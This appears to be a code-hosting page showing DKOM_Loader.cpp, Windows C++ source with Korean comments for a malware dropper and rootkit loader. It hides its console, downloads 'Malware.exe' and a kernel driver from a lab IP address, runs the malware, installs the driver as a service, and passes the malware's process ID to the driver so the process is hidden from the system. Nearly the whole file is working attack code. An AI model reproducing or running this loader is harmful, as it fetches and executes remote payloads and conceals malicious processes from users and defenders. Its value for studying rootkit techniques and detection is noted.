-
Notifications
You must be signed in to change notification settings - Fork 7
/
DKOM_Loader.cpp
192 lines (164 loc) · 4.74 KB
/
DKOM_Loader.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
#include <stdio.h>
#include <Windows.h>
#include <Winbase.h>
#include <Tlhelp32.h>
#include <strsafe.h>
#include <stdlib.h>
#include <winsock.h>
#include <wininet.h>
#include <atlstr.h>
#pragma comment(lib,"Wininet.lib")
#define READ_BUF_SIZE 1024
bool _util_load_sysfile()
{
LPCTSTR theDriverName = TEXT("DKOM_Driver");
LPCTSTR aPath = TEXT("C:\\Users\\eternalklaus\\AppData\\Local\\Temp\\DKOM_Driver.sys");
SC_HANDLE sh = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (!sh)
{
return false;
}
printf("loading %s\n", aPath);
SC_HANDLE rh = CreateService(sh, theDriverName, theDriverName, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, aPath, NULL, NULL, NULL, NULL, NULL);
if (!rh)
{
if (GetLastError() == ERROR_SERVICE_EXISTS)
{
rh = OpenService(sh, theDriverName, SERVICE_ALL_ACCESS);
if (!rh)
{
printf("Cannot open service\n");
CloseServiceHandle(sh);
return false;
}
}
else
{
printf("Cannot create service\n");
CloseServiceHandle(sh);
return false;
}
}
if (rh)
{
if (0 == StartService(rh, 0, NULL))
{
DWORD imsi = GetLastError();
if (imsi == ERROR_SERVICE_ALREADY_RUNNING)
{
printf("Service is already running\n");
}
else
{
printf("Cannot start service\n");
CloseServiceHandle(sh);
CloseServiceHandle(rh);
return false;
}
}
CloseServiceHandle(sh);
CloseServiceHandle(rh);
}
printf("Service started successfully\n");
return true;
}
int getFileFromHttp(char* pszUrl, char* pszFile)
{
HINTERNET hInet, hUrl;
DWORD dwReadSize = 0;
// WinINet함수 초기화
if ((hInet = InternetOpen(TEXT("MyWeb"), // user agent in the HTTP protocol
INTERNET_OPEN_TYPE_DIRECT, // AccessType
NULL, // ProxyName
NULL, // ProxyBypass
0)) != NULL) // Options
{
// 입력된 HTTP주소를 열기
if ((hUrl = InternetOpenUrl(hInet, // 인터넷 세션의 핸들
pszUrl, // URL
NULL, // HTTP server에 보내는 해더
0, // 해더 사이즈
0, // Flag
0)) != NULL) // Context
{
FILE *fp;
// 다운로드할 파일 만들기
if ((fp = fopen(pszFile, "wb")) != NULL)
{
TCHAR szBuff[READ_BUF_SIZE];
DWORD dwSize;
DWORD dwDebug = 10;
do {
// 웹상의 파일 읽기
InternetReadFile(hUrl, szBuff, READ_BUF_SIZE, &dwSize);
// 웹상의 파일을 만들어진 파일에 써넣기
fwrite(szBuff, dwSize, 1, fp);
dwReadSize += dwSize;
} while ((dwSize != 0) || (--dwDebug != 0));
fclose(fp);
}
// 인터넷 핸들 닫기
InternetCloseHandle(hUrl);
}
// 인터넷 핸들 닫기
InternetCloseHandle(hInet);
}
return(dwReadSize);
}
DWORD MyGetProcessId(LPCTSTR ProcessName) // non-conflicting function name
{
PROCESSENTRY32 pt;
HANDLE hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
pt.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hsnap, &pt)) { // must call this first
do {
if (!lstrcmpi(pt.szExeFile, ProcessName)) {
CloseHandle(hsnap);
return pt.th32ProcessID;
}
} while (Process32Next(hsnap, &pt));
}
CloseHandle(hsnap); // close handle on failure
return 0;
}
int main()
{
//콘솔 감추기
HWND hWndConsole = GetConsoleWindow();
ShowWindow(hWndConsole, SW_HIDE);
HANDLE hFile;
DWORD ProcessId, write;
//악성코드 파일 다운로드
char *Malware = "C:\\Users\\eternalklaus\\AppData\\Local\\Temp\\Malware.exe";
char *driver = "C:\\Users\\eternalklaus\\AppData\\Local\\Temp\\DKOM_Driver.sys";
getFileFromHttp("http://192.168.140.133/Malware.exe", Malware);
getFileFromHttp("http://192.168.140.133/DKOM_Driver.sys", driver);
//Malware.exe 실행
ShellExecute(NULL, "open", "C:\\Users\\eternalklaus\\AppData\\Local\\Temp\\Malware.exe", NULL, NULL, SW_SHOW);
//디바이스 드라이버 설치
_util_load_sysfile();
hFile = CreateFile("\\\\.\\DKOM_Driver", GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
ProcessId = MyGetProcessId(TEXT("Malware.exe"));
printf("Malware.exe : ProcessId is %d\n ", ProcessId);
//예외처리 01
if (ProcessId == 0) {
printf("cannot find processid!!\n");
return -1;
}
//예외처리 02
if (hFile == INVALID_HANDLE_VALUE)
{
printf("Error:(%d)\nMake sure the driver is loaded.\n", GetLastError());
return -1;
}
//chrome.exe 프로세스 은닉
if (!WriteFile(hFile, &ProcessId, sizeof(DWORD), &write, NULL))
{
printf("\nError: Unable to hide process (%d)\n", GetLastError());
}
else
{
printf("\nProcess successfully hidden.\n");
}
return 0;
}